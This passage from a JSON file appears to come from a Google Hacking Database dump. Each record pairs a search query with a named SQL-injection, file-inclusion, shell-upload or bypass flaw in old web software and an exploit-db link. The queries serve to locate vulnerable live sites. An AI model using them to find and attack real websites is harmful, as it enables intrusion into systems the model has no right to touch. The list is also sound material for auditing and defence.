Cosmos Solutions\"", "long description": "Cosmos Solutions cms SQL Injection Vulnerability ( id= / page= ): http://www.exploit-db.com/exploits/12794", "submited": "2010-11-15", "request": "\"Webdesign Cosmos Solutions\"", "id": 2581}, {"short description": "inurl:cal_cat.php?op=", "long description": "Calendarix (cal_cat.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14393", "submited": "2010-11-15", "request": "inurl:cal_cat.php?op=", "id": 2583}, {"short description": "inurl:com_liveticker", "long description": "Joomla Component Live Ticker 1.0 (tid) Blind SQL Injection Vuln - CVE: 2008-6148: http://www.exploit-db.com/exploits/7573", "submited": "2010-11-15", "request": "inurl:com_liveticker", "id": 2584}, {"short description": "intext:\"Powered by the 1-2-3 music store\"", "long description": "Easybe 1-2-3 Music Store (process.php) Remote SQL Injection Vuln - CVE: 2007-3520: http://www.exploit-db.com/exploits/4134", "submited": "2010-11-15", "request": "intext:\"Powered by the 1-2-3 music store\"", "id": 2585}, {"short description": "\"Powered by myBusinessAdmin and Red Cow Technologies, Inc.\"", "long description": "myBusinessAdmin (content.php) Blind Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11327", "submited": "2010-11-15", "request": "\"Powered by myBusinessAdmin and Red Cow Technologies, Inc.\"", "id": 2588}, {"short description": "\"Powered by cityadmin and Red Cow Technologies, Inc.\"", "long description": "cityadmin (links.php) Blind Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11326", "submited": "2010-11-15", "request": "\"Powered by cityadmin and Red Cow Technologies, Inc.\"", "id": 2589}, {"short description": "\"Powered by RealAdmin and Red Cow Technologies, Inc.\"", "long description": "RealAdmin (detail.php) Blind Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11325", "submited": "2010-11-15", "request": "\"Powered by RealAdmin and Red Cow Technologies, Inc.\"", "id": 2590}, {"short description": "?action=pro_show and ?action=disppro", "long description": "EPShop 3.0 (pid) Remote SQL Injection Vulnerability - CVE: 2008-3412: http://www.exploit-db.com/exploits/6139", "submited": "2010-11-15", "request": "?action=pro_show and ?action=disppro", "id": 2591}, {"short description": "Powered by WebspotBlogging", "long description": "bspotBlogging 3.0.1 (path) Remote File Include Vulnerability - CVE: 2006-2860: http://www.exploit-db.com/exploits/1871", "submited": "2010-11-15", "request": "Powered by WebspotBlogging", "id": 2592}, {"short description": "\"powered by vsp stats processor\"", "long description": "vsp stats processor 0.45 (gamestat.php gameID) SQL Injection Vuln - CVE: 2009-1224: http://www.exploit-db.com/exploits/8331", "submited": "2010-11-15", "request": "\"powered by vsp stats processor\"", "id": 2593}, {"short description": "inurl:employer_profile.php?compid=", "long description": "ZEEJOBSITE 2.0 (adid) Remote SQL Injection Vulnerability - CVE: 2008-3706: http://www.exploit-db.com/exploits/6249", "submited": "2010-11-15", "request": "inurl:employer_profile.php?compid=", "id": 2594}, {"short description": "inurl:com_awd_song", "long description": "Joomla JE Awd Song Component Persistent XSS Vulnerability - CVE: 2010-2613: http://www.exploit-db.com/exploits/14059", "submited": "2010-11-15", "request": "inurl:com_awd_song", "id": 2595}, {"short description": "\"MangoBery 1.0 Alpha\"", "long description": "MangoBery CMS 0.5.5 (quotes.php) Remote File Inclusion Vulnerability - CVE: 2007-1837: http://www.exploit-db.com/exploits/3598", "submited": "2010-11-15", "request": "\"MangoBery 1.0 Alpha\"", "id": 2599}, {"short description": "inurl:view_group.php?id=", "long description": "BookMarks Favourites Script (view_group.php id) SQL Injection Vuln - CVE: 2008-6007: http://www.exploit-db.com/exploits/6637", "submited": "2010-11-15", "request": "inurl:view_group.php?id=", "id": 2600}, {"short description": "mod.php?mod=publisher&amp;op=printarticle&amp;artid=", "long description": "eNdonesia 8.4 SQL Injection Vulnerability - CVE: 2010-3461: http://www.exploit-db.com/exploits/15006", "submited": "2010-11-15", "request": "mod.php?mod=publisher&amp;op=printarticle&amp;artid=", "id": 2601}, {"short description": "inurl:\"index.php?option=com_spa\"", "long description": "Joomla Component com_spa SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14423", "submited": "2010-11-15", "request": "inurl:\"index.php?option=com_spa\"", "id": 2602}, {"short description": "inurl:\"photo_album.php?alb_id=\"", "long description": "SpireCMS v2.0 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10408", "submited": "2010-11-15", "request": "inurl:\"photo_album.php?alb_id=\"", "id": 2605}, {"short description": "intext : \"Website by conceptinternetltd\"", "long description": "Concept E-commerce SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14512", "submited": "2010-11-15", "request": "intext : \"Website by conceptinternetltd\"", "id": 2606}, {"short description": "allinurl: \"index.php?p=gallerypic img_id\"", "long description": "Koobi 4.4/5.4 gallery Remote SQL Injection Vulnerability - CVE: 2008-6210: http://www.exploit-db.com/exploits/5415", "submited": "2010-11-15", "request": "allinurl: \"index.php?p=gallerypic img_id\"", "id": 2607}, {"short description": "allinurl:com_jpad", "long description": "Joomla Component JPad 1.0 SQL Injection Vulnerability (postauth) - CVE: 2008-4715: http://www.exploit-db.com/exploits/5493", "submited": "2010-11-15", "request": "allinurl:com_jpad", "id": 2608}, {"short description": "allinurl:\"com_candle\"", "long description": "Joomla Component Candle 1.0 (cID) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5221", "submited": "2010-11-15", "request": "allinurl:\"com_candle\"", "id": 2610}, {"short description": "\"powered by FlatPress\"", "long description": "FlatPress 0.909.1 Stored XSS Vulnerability: http://www.exploit-db.com/exploits/12034", "submited": "2010-11-15", "request": "\"powered by FlatPress\"", "id": 2611}, {"short description": "inurl:ugroups.php?UID=", "long description": "TubeGuru Video Sharing Script (UID) SQL Injection Vulnerability - CVE: 2008-3674: http://www.exploit-db.com/exploits/6170", "submited": "2010-11-15", "request": "inurl:ugroups.php?UID=", "id": 2612}, {"short description": "allinurl:option=com_livechat", "long description": "Joomla Live Chat (SQL/Proxy) Multiple Remote Vulnerabilities - CVE: 2008-6883: http://www.exploit-db.com/exploits/7441", "submited": "2010-11-15", "request": "allinurl:option=com_livechat", "id": 2613}, {"short description": "Powered by PHP Melody 1.5.3", "long description": "blog ink Bypass Setting Vulnerability: http://www.exploit-db.com/exploits/11462", "submited": "2010-11-15", "request": "Powered by PHP Melody 1.5.3", "id": 2614}, {"short description": "Powered by phpMyDesktop|arcade v1.0 (final)", "long description": "PhpMyDesktop|arcade 1.0 Final (phpdns_basedir) RFI Vulnerability: http://www.exploit-db.com/exploits/4755", "submited": "2010-11-15", "request": "Powered by phpMyDesktop|arcade v1.0 (final)", "id": 2615}, {"short description": "inurl:com_products \"intCategoryId\"", "long description": "Joomla com_products 'intCategoryId' Remote Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11691", "submited": "2010-11-15", "request": "inurl:com_products \"intCategoryId\"", "id": 2616}, {"short description": "inurl:\"guestbook.admin.php?action=settings\"", "long description": "Jax Guestbook 3.50 Admin Login - CVE: 2009-4447: http://www.exploit-db.com/exploits/10626", "submited": "2010-11-15", "request": "inurl:\"guestbook.admin.php?action=settings\"", "id": 2617}, {"short description": "inurl:index.php?mod=jeuxflash", "long description": "KwsPHP Module jeuxflash 1.0 (id) Remote SQL Injection Vulnerability - CVE: 2007-4922: http://www.exploit-db.com/exploits/4400", "submited": "2010-11-15", "request": "inurl:index.php?mod=jeuxflash", "id": 2620}, {"short description": "inurl:\"track.php?id=\"", "long description": "SFS EZ BIZ PRO (track.php id) Remote SQL Injection Vulnerability - CVE: 2008-6245: http://www.exploit-db.com/exploits/6910", "submited": "2010-11-15", "request": "inurl:\"track.php?id=\"", "id": 2622}, {"short description": "\"Ladder Scripts by\"", "long description": "My Gaming Ladder 7.5 (ladderid) SQL Injection Vulnerability - CVE: 2008-1791: http://www.exploit-db.com/exploits/5401", "submited": "2010-11-15", "request": "\"Ladder Scripts by\"", "id": 2623}, {"short description": "\"powergap\" or \"s04.php\" or s01.php or s02.php", "long description": "POWERGAP 2003 (s0x.php) Remote File Include Vulnerability - CVE: 2006-4236: http://www.exploit-db.com/exploits/2201", "submited": "2010-11-15", "request": "\"powergap\" or \"s04.php\" or s01.php or s02.php", "id": 2624}, {"short description": "\"Developed by Bispage.com\"", "long description": "bispage Bypass Vulnerability: http://www.exploit-db.com/exploits/11555", "submited": "2010-11-15", "request": "\"Developed by Bispage.com\"", "id": 2625}, {"short description": "\"PKs Movie Database\"", "long description": "PKs Movie Database 3.0.3 XSS / SQL Injection Vulnerabilities: http://www.exploit-db.com/exploits/5095", "submited": "2010-11-15", "request": "\"PKs Movie Database\"", "id": 2626}, {"short description": "inurl:enq/big.asp?id=", "long description": "(big.asp) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12533", "submited": "2010-11-15", "request": "inurl:enq/big.asp?id=", "id": 2628}, {"short description": "Script cree par Funewik - Dezign-Box France", "long description": "Galerie Dezign-Box France Multi Vulnerability: http://www.exploit-db.com/exploits/11523", "submited": "2010-11-15", "request": "Script cree par Funewik - Dezign-Box France", "id": 2629}, {"short description": "allintext:\"Powered By Buddy Zone\"", "long description": "Buddy Zone 1.5 (view_sub_cat.php cat_id) SQL Injection Vulnerability - CVE: 2007-3549: http://www.exploit-db.com/exploits/4127", "submited": "2010-11-15", "request": "allintext:\"Powered By Buddy Zone\"", "id": 2630}, {"short description": "intext:\" Website Design and Hosting By Netricks, Inc.\"", "long description": "Website Design and Hosting By Netricks, Inc (news.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12736", "submited": "2010-11-15", "request": "intext:\" Website Design and Hosting By Netricks, Inc.\"", "id": 2631}, {"short description": "com_thyme", "long description": "Joomla Component Thyme 1.0 (event) SQL Injection Vulnerability - CVE: 2008-6116: http://www.exploit-db.com/exploits/7182", "submited": "2010-11-15", "request": "com_thyme", "id": 2632}, {"short description": "\"PHP WEBQUEST VERSION \" or inurl:\"/phpwebquest/\"", "long description": "PHP Webquest 2.6 Get Database Credentials Vulnerability - CVE: 2008-0249: http://www.exploit-db.com/exploits/4872", "submited": "2010-11-15", "request": "\"PHP WEBQUEST VERSION \" or inurl:\"/phpwebquest/\"", "id": 2636}, {"short description": "All right reserved 2002-2003 (MSN/Web Server Creator)", "long description": "Web Server Creator - Web Portal v 0.1 Multi Vulnerability - CVE: 2010-1113: http://www.exploit-db.com/exploits/11569", "submited": "2010-11-15", "request": "All right reserved 2002-2003 (MSN/Web Server Creator)", "id": 2638}, {"short description": "\"Powerd by www.e-webtech.com\"", "long description": "e-webtech (page.asp) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12571", "submited": "2010-11-15", "request": "\"Powerd by www.e-webtech.com\"", "id": 2640}, {"short description": "powered by PhpMesFilms", "long description": "PhpMesFilms 1.0 (index.php id) Remote SQL Injection Vulnerability - CVE: 2009-0598: http://www.exploit-db.com/exploits/7660", "submited": "2010-11-15", "request": "powered by PhpMesFilms", "id": 2641}, {"short description": "\"Internet Photoshow - Slideshow\"", "long description": "Internet Photoshow (Special Edition) Insecure Cookie Handling Vuln - CVE: 2008-2282: http://www.exploit-db.com/exploits/5617", "submited": "2010-11-15", "request": "\"Internet Photoshow - Slideshow\"", "id": 2645}, {"short description": "inurl:choosecard.php?catid=", "long description": "WEBBDOMAIN Post Card 1.02 (catid) SQL Injection Vulnerability - CVE: 2008-6622: http://www.exploit-db.com/exploits/6977", "submited": "2010-11-15", "request": "inurl:choosecard.php?catid=", "id": 2646}, {"short description": "\"Powered by Real Estate Portal\"", "long description": "NetArtMedia Real Estate Portal 1.2 (ad_id) SQL Injection Vuln - CVE: 2008-5309: http://www.exploit-db.com/exploits/7208", "submited": "2010-11-15", "request": "\"Powered by Real Estate Portal\"", "id": 2647}, {"short description": "inurl:browsecats.php?cid=", "long description": "PozScripts Classified Ads Script (cid) SQL Injection Vulnerability - CVE: 2008-3672: http://www.exploit-db.com/exploits/6169", "submited": "2010-11-15", "request": "inurl:browsecats.php?cid=", "id": 2648}, {"short description": "inurl:com_mdigg", "long description": "Joomla Component mdigg 2.2.8 (category) SQL Injection Vuln - CVE: 2008-6149: http://www.exploit-db.com/exploits/7574", "submited": "2010-11-15", "request": "inurl:com_mdigg", "id": 2649}, {"short description": "\"by in-link\"  or  \"Powered by In-Link 2.\"", "long description": "In-link 2.3.4 (ADODB_DIR) Remote File Include Vulnerabilities: http://www.exploit-db.com/exploits/2295", "submited": "2010-11-15", "request": "\"by in-link\"  or  \"Powered by In-Link 2.\"", "id": 2651}, {"short description": "inurl:trr.php?id=", "long description": "Ad Board (id) Remote SQL Injection Vulnerability - CVE: 2008-3725: http://www.exploit-db.com/exploits/6271", "submited": "2010-11-15", "request": "inurl:trr.php?id=", "id": 2652}, {"short description": "inurl:\"kroax.php?category\"", "long description": "PHP-Fusion Mod Kroax 4.42 (category) SQL Injection Vulnerability - CVE: 2008-5196: http://www.exploit-db.com/exploits/5942", "submited": "2010-11-15", "request": "inurl:\"kroax.php?category\"", "id": 2653}, {"short description": "\"Powered by Reciprocal Links Manager\"", "long description": "Reciprocal Links Manager 1.1 (site) SQL Injection Vulnerability - CVE: 2008-4086: http://www.exploit-db.com/exploits/6349", "submited": "2010-11-15", "request": "\"Powered by Reciprocal Links Manager\"", "id": 2654}, {"short description": "allintext:\"Latest Pictures\" Name   Gender   Profile   Rating", "long description": "Pictures Rating (index.php msgid) Remote SQL Injection Vulnerbility - CVE: 2007-3881: http://www.exploit-db.com/exploits/4191", "submited": "2010-11-15", "request": "allintext:\"Latest Pictures\" Name   Gender   Profile   Rating", "id": 2656}, {"short description": "intext:\"Powered by eDocStore\"", "long description": "eDocStore (doc.php doc_id) Remote SQL Injection Vulnerability - CVE: 2007-3452: http://www.exploit-db.com/exploits/4108", "submited": "2010-11-15", "request": "intext:\"Powered by eDocStore\"", "id": 2658}, {"short description": "Powered by AM4SS 1.0", "long description": "Advneced Management For Services Sites (File Disclosure) Vulnerabilities: http://www.exploit-db.com/exploits/12859", "submited": "2010-11-15", "request": "Powered by AM4SS 1.0", "id": 2660}, {"short description": "\"Powered by AlstraSoft SendIt Pro\"", "long description": "AlstraSoft SendIt Pro Remote File Upload Vulnerability - CVE: 2008-6932: http://www.exploit-db.com/exploits/7101", "submited": "2010-11-15", "request": "\"Powered by AlstraSoft SendIt Pro\"", "id": 2661}, {"short description": "inurl:com_content", "long description": "Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln - CVE: 2008-6923: http://www.exploit-db.com/exploits/6025", "submited": "2010-11-15", "request": "inurl:com_content", "id": 2663}, {"short description": "inurl:\"noticias.php?notiId=\"", "long description": "Ele Medios CMS SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10418", "submited": "2010-11-15", "request": "inurl:\"noticias.php?notiId=\"", "id": 2664}, {"short description": "inurl:\"index.php?option=com_huruhelpdesk\"", "long description": "Joomla Component (com_huruhelpdesk) SQL Injection Vulnerability - CVE: 2010-2907: http://www.exploit-db.com/exploits/14449", "submited": "2010-11-15", "request": "inurl:\"index.php?option=com_huruhelpdesk\"", "id": 2665}, {"short description": "Powered by Article Directory", "long description": "Authenication Bypass Vulnerability in Articles Directory: http://www.exploit-db.com/exploits/12445", "submited": "2010-11-15", "request": "Powered by Article Directory", "id": 2667}, {"short description": "\"Copyright 2005 Affiliate Directory\"", "long description": "SFS Affiliate Directory (id) SQL Injection Vulnerability - CVE: 2008-3719: http://www.exploit-db.com/exploits/6270", "submited": "2010-11-15", "request": "\"Copyright 2005 Affiliate Directory\"", "id": 2668}, {"short description": "inurl:\"index.php?option=com_bookjoomlas\"", "long description": "Joomla Component com_bookjoomlas 0.1 SQL Injection Vulnerability - CVE: 2009-1263: http://www.exploit-db.com/exploits/8353", "submited": "2010-11-15", "request": "inurl:\"index.php?option=com_bookjoomlas\"", "id": 2669}, {"short description": "DevMass Shopping Cart", "long description": "DevMass Shopping Cart 1.0 Remote File Include Vulnerability - CVE: 2007-6133: http://www.exploit-db.com/exploits/4642", "submited": "2010-11-15", "request": "DevMass Shopping Cart", "id": 2670}, {"short description": "inurl:index.php?option=com_allhotels", "long description": "Joomla Component com_allhotels (id) Blind SQL Injection Vulnerability - CVE: 2008-5874: http://www.exploit-db.com/exploits/7568", "submited": "2010-11-15", "request": "inurl:index.php?option=com_allhotels", "id": 2671}, {"short description": "\"powered by aflog\"", "long description": "aflog 1.01 Multiple Insecure Cookie Handling Vulnerabilies - CVE: 2008-4784: http://www.exploit-db.com/exploits/6818", "submited": "2010-11-15", "request": "\"powered by aflog\"", "id": 2672}, {"short description": "inurl:\"index.php?option=com_simplefaq\"", "long description": "Mambo Component SimpleFAQ 2.11 Remote SQL Injection Vulnerability - CVE: 2007-4456: http://www.exploit-db.com/exploits/4296", "submited": "2010-11-15", "request": "inurl:\"index.php?option=com_simplefaq\"", "id": 2673}, {"short description": "inurl:couponsite/index.php?page=", "long description": "Coupon Script 4.0 (id) Remote SQL Injection Vulnerability - CVE: 2008-4090: http://www.exploit-db.com/exploits/6348", "submited": "2010-11-15", "request": "inurl:couponsite/index.php?page=", "id": 2674}, {"short description": "inurl:\"directory.php?ax=list\" gaming", "long description": "Gaming Directory 1.0 (cat_id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5374", "submited": "2010-11-15", "request": "inurl:\"directory.php?ax=list\" gaming", "id": 2675}, {"short description": "\"script by RECIPE SCRIPT\"", "long description": "The Recipe Script 5 Remote XSS Vulnerability: http://www.exploit-db.com/exploits/8967", "submited": "2010-11-15", "request": "\"script by RECIPE SCRIPT\"", "id": 2677}, {"short description": "inurl:\"index.php?option=com_jobline\"", "long description": "Joomla Component Jobline 1.3.1 Blind SQL Injection Vulnerability - CVE: 2009-2554: http://www.exploit-db.com/exploits/9187", "submited": "2010-11-15", "request": "inurl:\"index.php?option=com_jobline\"", "id": 2679}, {"short description": "Dosya Yukle Scrtipi v1.0", "long description": "Dosya Yukle Scrtipi v1.0 Shell Upload Vulnerability: http://www.exploit-db.com/exploits/11620", "submited": "2010-11-15", "request": "Dosya Yukle Scrtipi v1.0", "id": 2680}, {"short description": "allinurl: modules-php-op-modload \"req view_cat\"", "long description": "PHP-Nuke Module books SQL (cid) Remote SQL Injection Vulnerability - CVE: 2008-0827: http://www.exploit-db.com/exploits/5147", "submited": "2010-11-15", "request": "allinurl: modules-php-op-modload \"req view_cat\"", "id": 2681}, {"short description": "\"Powered by Absolute File Send\"", "long description": "Absolute File Send 1.0 Remote Cookie Handling Vulnerability: http://www.exploit-db.com/exploits/6881", "submited": "2010-11-15", "request": "\"Powered by Absolute File Send\"", "id": 2684}, {"short description": "inurl:wapmain.php?option=", "long description": "Joomla Component Wap4Joomla (wapmain.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12440", "submited": "2010-11-15", "request": "inurl:wapmain.php?option=", "id": 2686}, {"short description": "allinurl:\"com_na_content\"", "long description": "Mambo Component Sermon 0.2 (gid) SQL Injection Vulnerability - CVE: 2008-0721: http://www.exploit-db.com/exploits/5076", "submited": "2010-11-15", "request": "allinurl:\"com_na_content\"", "id": 2688}, {"short description": "inurl:\"com_jcalpro\"", "long description": "Joomla Component com_jcalpro 1.5.3.6 Remote File Inclusion - CVE: 2009-4431: http://www.exploit-db.com/exploits/10587", "submited": "2010-11-15", "request": "inurl:\"com_jcalpro\"", "id": 2689}, {"short description": "Powered by Webiz", "long description": "(Webiz) local SHELL Upload Vulnerability: http://www.exploit-db.com/exploits/12797", "submited": "2010-11-15", "request": "Powered by Webiz", "id": 2690}, {"short description": "inurl:category.php?cate_id=", "long description": "GC Auction Platinum (cate_id) Remote SQL Injection Vulnerability - CVE: 2008-3413: http://www.exploit-db.com/exploits/6144", "submited": "2010-11-15", "request": "inurl:category.php?cate_id=", "id": 2691}, {"short description": "CaLogic Calendars V1.2.2", "long description": "CaLogic Calendars 1.2.2 (CLPath) Remote File Include Vulnerabilities - CVE: 2006-2570: http://www.exploit-db.com/exploits/1809", "submited": "2010-11-15", "request": "CaLogic Calendars V1.2.2", "id": 2693}, {"short description": "Copyright 2008 Free Image &amp; File Hosting", "long description": "Free Image &amp; File Hosting Upload Vulnerability: http://www.exploit-db.com/exploits/12105", "submited": "2010-11-15", "request": "Copyright 2008 Free Image &amp; File Hosting", "id": 2694}, {"short description": "\"PHP Gallery 2010 PHP Weby hostgator coupon\"", "long description": "Free PHP photo gallery script Remote File inclusion Vulnerability: http://www.exploit-db.com/exploits/14438", "submited": "2010-11-15", "request": "\"PHP Gallery 2010 PHP Weby hostgator coupon\"", "id": 2695}, {"short description": "\"Powered by Rock Band CMS 0.10\"", "long description": "BandCMS 0.10 news.php Multiple SQL Injection Vulnerabilities - CVE: 2009-3252: http://www.exploit-db.com/exploits/9553", "submited": "2010-11-15", "request": "\"Powered by Rock Band CMS 0.10\"", "id": 2696}, {"short description": "Copyright Acme 2008", "long description": "AJ HYIP ACME (news.php id) Remote SQL Injection Vulnerability - CVE: 2008-2893: http://www.exploit-db.com/exploits/5890", "submited": "2010-11-15", "request": "Copyright Acme 2008", "id": 2698}, {"short description": "\"Send amazing greetings to your friends and relative!\"", "long description": "Greeting card SQL Injection Vulnerability: http://www.exploit-db.com/exploits/13983", "submited": "2010-11-15", "request": "\"Send amazing greetings to your friends and relative!\"", "id": 2699}, {"short description": "\"Creative Guestbook\"", "long description": "Creative Guestbook 1.0 Multiple Remote Vulnerabilities - CVE: 2007-1479: http://www.exploit-db.com/exploits/3489", "submited": "2010-11-15", "request": "\"Creative Guestbook\"", "id": 2700}, {"short description": "\"DeeEmm CMS\"", "long description": "DeeEmm CMS (DMCMS) 0.7.4 Multiple Remote Vulnerabilities - CVE: 2008-3721: http://www.exploit-db.com/exploits/6250", "submited": "2010-11-15", "request": "\"DeeEmm CMS\"", "id": 2701}, {"short description": "\"PHP Gallery 2010 PHP Weby hostgator coupon\"", "long description": "ValidForm Builder script Remote Command Execution Vulnerability: http://www.exploit-db.com/exploits/14454", "submited": "2010-11-15", "request": "\"PHP Gallery 2010 PHP Weby hostgator coupon\"", "id": 2702}, {"short description": "powered by vBulletin 4.0.4", "long description": "VBbuletin 4.0.4 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/14686", "submited": "2010-11-15", "request": "powered by vBulletin 4.0.4", "id": 2703}, {"short description": "Copyright 2007 Agares Media. Powered by AMCMS3.", "long description": "Arcadem Pro (articlecat) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6624", "submited": "2010-11-15", "request": "Copyright 2007 Agares Media. Powered by AMCMS3.", "id": 2704}, {"short description": "\"Vivid Ads Shopping Cart\"", "long description": "Vivid Ads Shopping Cart (prodid) Remote SQL Injection: http://www.exploit-db.com/exploits/10297", "submited": "2010-11-15", "request": "\"Vivid Ads Shopping Cart\"", "id": 2705}, {"short description": "inurl:\"/rbfminc/\"", "long description": "RogioBiz_PHP_file_manager_V1.2 bypass admin: http://www.exploit-db.com/exploits/11731", "submited": "2010-11-15", "request": "inurl:\"/rbfminc/\"", "id": 2706}, {"short description": "intext:Powered by AWCM v2.1", "long description": "AWCM 2.1 Local File Inclusion / Auth Bypass Vulnerabilities - CVE: 2009-3219: http://www.exploit-db.com/exploits/9237", "submited": "2010-11-15", "request": "intext:Powered by AWCM v2.1", "id": 2707}, {"short description": "inurl:\"lista_articulos.php?id_categoria=\"", "long description": "SitioOnline SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10453", "submited": "2010-11-15", "request": "inurl:\"lista_articulos.php?id_categoria=\"", "id": 2709}, {"short description": "\"Powered By AlstraSoft AskMe Pro\"", "long description": "AlstraSoft AskMe Pro 2.1 Multiple SQL Injection Vulnerabilities - CVE: 2008-2902: http://www.exploit-db.com/exploits/5821", "submited": "2010-11-15", "request": "\"Powered By AlstraSoft AskMe Pro\"", "id": 2710}, {"short description": "allinurl:\"com_neogallery\"", "long description": "Joomla Component NeoGallery 1.1 SQL Injection Vulnerability - CVE: 2008-0752: http://www.exploit-db.com/exploits/5083", "submited": "2010-11-15", "request": "allinurl:\"com_neogallery\"", "id": 2711}, {"short description": "inurl:\"com_category\"", "long description": "Joomla Component com_category (catid) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/9126", "submited": "2010-11-15", "request": "inurl:\"com_category\"", "id": 2712}, {"short description": "\"Powered By Zoopeer\"", "long description": "Zoopeer 0.1 &amp; 0.2 (fckeditor) Shell Upload Vulnerability: http://www.exploit-db.com/exploits/15354", "submited": "2010-11-15", "request": "\"Powered By Zoopeer\"", "id": 2713}, {"short description": "inurl:index.php?ortupg=", "long description": "CMS Ortus 1.13 Remote SQL Injection Vulnerability - CVE: 2008-6282: http://www.exploit-db.com/exploits/7237", "submited": "2010-11-15", "request": "inurl:index.php?ortupg=", "id": 2714}, {"short description": "inurl:com_jomtube", "long description": "Joomla Component com_jomtube (user_id) Blind SQL Injection / SQL Injection: http://www.exploit-db.com/exploits/14434", "submited": "2010-11-15", "request": "inurl:com_jomtube", "id": 2715}, {"short description": "\"Powered by web directory script\"", "long description": "Web Directory Script 1.5.3 (site) SQL Injection Vulnerability - CVE: 2008-4091: http://www.exploit-db.com/exploits/6335", "submited": "2010-11-15", "request": "\"Powered by web directory script\"", "id": 2716}, {"short description": "inurl:com_gigcal", "long description": "Joomla Component com_gigcal (gigcal_gigs_id) SQL Injection Vuln - CVE: 2009-0726: http://www.exploit-db.com/exploits/7746", "submited": "2010-11-15", "request": "inurl:com_gigcal", "id": 2717}, {"short description": "Powered MarketSaz", "long description": "MarketSaz remote file Upload Vulnerability: http://www.exploit-db.com/exploits/13927", "submited": "2010-11-15", "request": "Powered MarketSaz", "id": 2718}, {"short description": "\"PHPWebAdmin for hMailServer\" intitle:PHPWebAdmin -site:hmailserver.com", "long description": "hMAilServer 4.4.2 (PHPWebAdmin) File Inclusion Vulnerabilities: http://www.exploit-db.com/exploits/7012", "submited": "2010-11-15", "request": "\"PHPWebAdmin for hMailServer\" intitle:PHPWebAdmin -site:hmailserver.com", "id": 2719}, {"short description": "inurl:com_ezautos", "long description": "Joomla Component (com_ezautos) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/15085", "submited": "2010-11-15", "request": "inurl:com_ezautos", "id": 2720}, {"short description": "\"Designed &amp; Developed by Zeeways.com\"", "long description": "zeeproperty 1.0 (Upload/XSS) Multiple Remote Vulnerabilities - CVE: 2008-6915: http://www.exploit-db.com/exploits/7058", "submited": "2010-11-15", "request": "\"Designed &amp; Developed by Zeeways.com\"", "id": 2721}, {"short description": "inurl:option=com_education_classes", "long description": "joomla component education SQL injection Vulnerability: http://www.exploit-db.com/exploits/12153", "submited": "2010-11-15", "request": "inurl:option=com_education_classes", "id": 2722}, {"short description": "allinurl:\"lyrics_menu/lyrics_song.php?l_id=\"", "long description": "e107 Plugin lyrics_menu (lyrics_song.php l_id) SQL Injection Vulnerability - CVE: 2008-4906: http://www.exploit-db.com/exploits/6885", "submited": "2010-11-15", "request": "allinurl:\"lyrics_menu/lyrics_song.php?l_id=\"", "id": 2723}, {"short description": "infusions/recept/recept.php?", "long description": "PHP-Fusion Mod recept (kat_id) SQL Injection Vulnerability - CVE: 2008-4527: http://www.exploit-db.com/exploits/6683", "submited": "2010-11-15", "request": "infusions/recept/recept.php?", "id": 2726}, {"short description": "Copyright 2010 My Hosting. All rights reserved", "long description": "Hosting-php-dynamic (Auth Bypass) Vulnerability: http://www.exploit-db.com/exploits/11968", "submited": "2010-11-15", "request": "Copyright 2010 My Hosting. All rights reserved", "id": 2727}, {"short description": "\"Powered By diskos\"", "long description": "Diskos CMS Manager (SQL/DB/Auth Bypass) Multiple Vulnerabilities - CVE: 2009-4798: http://www.exploit-db.com/exploits/8307", "submited": "2010-11-15", "request": "\"Powered By diskos\"", "id": 2729}, {"short description": "Copyright 2006 Flax Article Manager v1.1", "long description": "Flax Article Manager 1.1 (cat_id) SQL Injection Vulnerability - CVE: 2009-0284: http://www.exploit-db.com/exploits/7862", "submited": "2010-11-15", "request": "Copyright 2006 Flax Article Manager v1.1", "id": 2732}, {"short description": "Powered by PHP Image Gallery", "long description": "SoftComplex PHP Image Gallery 1.0 (Auth Bypass) SQL Injection Vuln - CVE: 2008-6488: http://www.exploit-db.com/exploits/7021", "submited": "2010-11-15", "request": "Powered by PHP Image Gallery", "id": 2734}, {"short description": "Powered By Pligg | Legal: License and Source", "long description": "Pligg CMS 9.9.0 (story.php id) Remote SQL Injection Vulnerability - CVE: 2008-3366: http://www.exploit-db.com/exploits/6146", "submited": "2010-11-15", "request": "Powered By Pligg | Legal: License and Source", "id": 2736}, {"short description": "\"PHP Gallery 2010 PHP Weby hostgator coupon\"", "long description": "Free PHP photo gallery script Remote Command Execution Vulnerability: http://www.exploit-db.com/exploits/14437", "submited": "2010-11-15", "request": "\"PHP Gallery 2010 PHP Weby hostgator coupon\"", "id": 2737}, {"short description": "inurl:/_blogadata/", "long description": "Blogator-script 0.95 Change User Password Vulnerability - CVE: 2008-6473: http://www.exploit-db.com/exploits/5370", "submited": "2010-11-15", "request": "inurl:/_blogadata/", "id": 2738}, {"short description": "\"index.php?option=com_chronocontact\" / \"com_chronocontact\"", "long description": "Joomla Component ChronoForms (com_chronocontact): http://www.exploit-db.com/exploits/12843", "submited": "2010-11-15", "request": "\"index.php?option=com_chronocontact\" / \"com_chronocontact\"", "id": 2739}, {"short description": "inurl:\"com_a6mambocredits\"", "long description": "Mambo a6mambocredits Component 1.0.0 File Include Vulnerability - CVE: 2006-4288: http://www.exploit-db.com/exploits/2207", "submited": "2010-11-15", "request": "inurl:\"com_a6mambocredits\"", "id": 2741}, {"short description": "\"index.php?id_menu=\" CMScontrol", "long description": "CMScontrol (Content Management Portal Solutions) Sql Injection - CVE: 2009-3326: http://www.exploit-db.com/exploits/9727", "submited": "2010-11-15", "request": "\"index.php?id_menu=\" CMScontrol", "id": 2742}, {"short description": 